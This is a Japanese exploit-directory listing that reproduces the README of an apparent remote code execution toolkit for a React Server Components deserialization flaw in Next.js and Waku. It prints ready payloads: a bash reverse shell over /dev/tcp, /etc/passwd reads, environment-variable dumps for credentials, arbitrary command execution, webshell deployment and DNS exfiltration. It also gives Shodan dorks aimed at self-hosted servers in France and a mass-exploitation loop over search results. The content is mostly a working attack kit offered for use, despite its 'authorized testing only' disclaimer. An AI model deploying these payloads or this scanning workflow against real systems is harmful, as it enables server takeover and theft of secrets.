Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PoC-RCE-CVE-2025-55182 — React Server Components の脆弱性に対する高度な RCE エクスプロイトツールキット。複数の事前構築済みペイロード、ターゲット発見のための Shodan 統合、および許可された侵入テストのための大量スキャン機能を備えています。 | Kitploit
ツール/GitHubGitHub/ilixm/poc-rce-cve-2025-55182
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストコマンド&コントロールレッドチーミングリモートアクセスツールペイロード開発
GitHubilixm/poc-rce-cve-2025-55182
149ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

PoC-RCE-CVE-2025-55182

React Server Components の脆弱性に対する高度な RCE エクスプロイトツールキット。複数の事前構築済みペイロード、ターゲット発見のための Shodan 統合、および許可された侵入テストのための大量スキャン機能を備えています。

リポジトリを見る

🔥 RSC RCE Exploit Toolkit

Version License Node Platform

React Server Components リモートコード実行脆弱性向け高度なエクスプロイトツールキット

認可されたペネトレーションテストおよびセキュリティ研究専用

特徴 • インストール • 使用方法 • Shodan連携 • 例 • 免責事項


📋 目次

  • 概要
  • 脆弱性の詳細
  • 特徴
  • インストール
  • クイックスタート
  • 使用方法
    • 基本エクスプロイト
    • 利用可能なペイロード
    • カスタムペイロード
  • Shodan連携
  • 自動スキャン
  • 例
  • 緩和策
  • 影響を受けるバージョン
  • 貢献
  • 免責事項
  • ライセンス

🎯 概要

このツールキットは、React Server Components(RSC)実装における重大な**リモートコード実行(RCE)**脆弱性を悪用します。具体的には以下を対象とします:

  • Next.js(バージョン13.4.0~14.1.0)
  • Waku(脆弱なバージョン)

この脆弱性は、RSCのデータ処理メカニズムにおけるプロトタイプ汚染と安全でないデシリアライゼーションを利用して、サーバー上で任意のコード実行を達成します。

🔴 深刻度:CRITICAL

  • CVSSスコア: 9.8(Critical)
  • 攻撃ベクトル: ネットワーク
  • 必要な権限: なし
  • ユーザー操作: なし
  • 影響: サーバー完全侵害

🔬 脆弱性の詳細

技術的背景

React Server Componentsは、クライアントとサーバー間でデータを転送するためにカスタムシリアライゼーション形式を使用しています。脆弱性は、これらのフレームワークが特別に細工されたペイロードをデシリアライズして処理する方法に存在します。

攻撃チェーン:

  1. ペイロード構築: 循環参照を含む悪意のあるRSCペイロードを作成
  2. プロトタイプ汚染: $X:constructor:constructor を悪用してFunctionコンストラクタにアクセス
  3. コードインジェクション: _prefixフィールドに任意のJavaScriptを注入
  4. 実行: サーバーがペイロードをデシリアライズして実行

エクスプロイトフロー

攻撃者 → 悪意のあるRSCペイロード → ターゲットサーバー
                                         ↓
                              安全でないデシリアライゼーション
                                         ↓
                              プロトタイプチェーンアクセス
                                         ↓
                              Functionコンストラクタ
                                         ↓
                              ⚠️ RCE達成 ⚠️

✨ 特徴

コア機能

  • ✅ 複数フレームワーク対応: Next.js および Waku
  • ✅ 8つのプリビルドペイロード: PoCから完全なリバースシェルまで
  • ✅ カスタムコード実行: 任意のJavaScriptコードを注入
  • ✅ Shodan連携: 自動ターゲット発見
  • ✅ 一括スキャン: 複数ターゲットを自動テスト
  • ✅ プロフェッショナルなCLI: 完全なコマンドラインインターフェース
  • ✅ 詳細なログ出力: タイムスタンプ付きカラーコード出力
  • ✅ エラーハンドリング: 堅牢なエラー管理

プリビルドペイロード

ペイロード説明使用例
console基本的なPoC(console.log)脆弱性の確認
reverseShellBashリバースシェル初期アクセス
readFile/etc/passwd を読み取りファイルシステムアクセス
envDump環境変数をダンプ資格情報抽出
execCommandシステムコマンドを実行任意のコマンド実行
webshellExpressウェブシェルを展開永続的なアクセス
exfilPackagepackage.json を外部送信依存関係分析
dnsExfilDNS経由の外部送信(OOB)ブラインドエクスプロイト

📦 インストール

前提条件

  • Node.js >= 16.0.0
  • npm または yarn
  • Shodan CLI(オプション、自動スキャン用)

リポジトリのクローン

git clone https://github.com/yourusername/rsc-rce-exploit.git
cd rsc-rce-exploit

依存関係のインストール

npm install
# または
yarn install

Shodanのセットアップ(オプション)

# Shodan CLIのインストール
pip install shodan

# APIキーで初期化
shodan init YOUR_API_KEY

🚀 クイックスタート

1. 基本的な脆弱性確認

node rsc-rce-exploit.js --target http://vulnerable-target.com --payload console

2. リバースシェルの取得

# リスナー起動
nc -lvnp 4444

# エクスプロイト実行
node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload reverseShell \
  --lhost 10.10.14.5 \
  --lport 4444

3. カスタムコマンドの実行

node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload execCommand \
  --command "whoami"

📖 使用方法

基本エクスプロイト

node rsc-rce-exploit.js [options]

オプション

オプション説明必須
--target <url>ターゲットURL✅
--framework <name>フレームワーク: next または waku❌(デフォルト: next)
--payload <name>ペイロード名(下記参照)✅*
--custom <code>カスタムJavaScriptコード✅*
--lhost <ip>自身のIP(リバースシェル用)❌
--lport <port>自身のポート(リバースシェル用)❌
--command <cmd>実行するコマンド❌
--endpoint <path>カスタムRSCエンドポイント(Waku)❌
--action-id <id>カスタムnext-action ID❌
--list利用可能なペイロード一覧表示❌
--verbose詳細出力❌
--helpヘルプ表示❌

*--payload または --custom のいずれかが必須

利用可能なペイロード

全ペイロードの表示:

node rsc-rce-exploit.js --list

出力:

📋 利用可能なペイロード:

  console              - 基本的なPoC - コンソール出力
    コード: console.log(7*7+1)

  reverseShell         - リバースシェル(bash)
    コード: require('child_process').exec('bash -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"')

  readFile             - /etc/passwd の読み取り
    コード: console.log(require('fs').readFileSync('/etc/passwd','utf8'))

  envDump              - 環境変数のダンプ
    コード: console.log(JSON.stringify(process.env,null,2))

  execCommand          - システムコマンドの実行
    コード: console.log(require('child_process').execSync('COMMAND').toString())

  webshell             - ウェブシェルを /tmp に書き込み
    コード: require('fs').writeFileSync('/tmp/shell.js','...')

  exfilPackage         - package.json の読み取り
    コード: console.log(require('fs').readFileSync('./package.json','utf8'))

  dnsExfil             - DNS経由の外部送信
    コード: require('dns').resolve4(Buffer.from(process.env.SECRET||'nosecret')...)

カスタムペイロード

任意のJavaScriptコードを実行:

node rsc-rce-exploit.js \
  --target http://target.com \
  --custom "require('fs').readdirSync('.').forEach(f=>console.log(f))"

🌐 Shodan連携

Shodan Dorks

Next.js ターゲット

# 基本的なNext.js
http.component:"Next.js"

# RSCを使用したNext.js
http.html:"__next" http.html:"RSC"

# 開発モードのNext.js(より脆弱)
http.html:"__NEXT_DATA__" http.html:"development"

# セルフホスト型Next.js(Vercel以外)
http.component:"Next.js" -org:"Vercel"

# 地理的ターゲット(フランス)
http.component:"Next.js" country:FR

# ペネトレーションテスト用の最適な組み合わせ
http.component:"Next.js" http.status:200 country:FR -org:"Vercel" port:3000,8080

Waku ターゲット

# Wakuフレームワーク
http.html:"waku" http.html:"RSC"

# Waku RSCエンドポイント
http.path:"/RSC/"

自動Shodanスキャン

提供されている自動化スクリプトを使用:

# スキャンして自動テスト
./shodan-scanner.sh "http.component:\"Next.js\" country:FR" 100

# カスタムペイロード付き
./shodan-scanner.sh "http.component:\"Next.js\"" 50 envDump

手動Shodanワークフロー

# 1. Shodan検索
shodan search 'http.component:"Next.js" country:FR' \
  --fields ip_str,port,org,hostnames \
  --limit 100 > targets.txt

# 2. 各ターゲットをテスト
while read -r line; do
    ip=$(echo $line | awk '{print $1}')
    port=$(echo $line | awk '{print $2}')
    echo "[*] Testing http://$ip:$port"
    node rsc-rce-exploit.js \
      --target "http://$ip:$port" \
      --payload console
done < targets.txt

🤖 自動スキャン

一括エクスプロイトスクリプト

mass-exploit.jsツールを使用すると、複数ターゲットをテストできます:

# ファイルから
node mass-exploit.js --file targets.txt --payload console --threads 10

# Shodanから
node mass-exploit.js --shodan "http.component:\"Next.js\"" --limit 50 --payload envDump

# 結果を保存
node mass-exploit.js --file targets.txt --payload console --output results.json

CI/CDへの統合

自動セキュリティテストの例:

# .github/workflows/security-test.yml
name: RSC セキュリティテスト
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: npm install
      - run: node rsc-rce-exploit.js --target http://staging.example.com --payload console

💡 例

例1: 基本的なPoC

node rsc-rce-exploit.js \
  --target https://vulnerable.example.com \
  --payload console

予想される出力:

╔═══════════════════════════════════════════════════════════╗
║           RSC RCE Exploit - 拡張バージョン                ║
║         React Server Components コード実行                ║
╚═══════════════════════════════════════════════════════════╝
ツールをダウンロード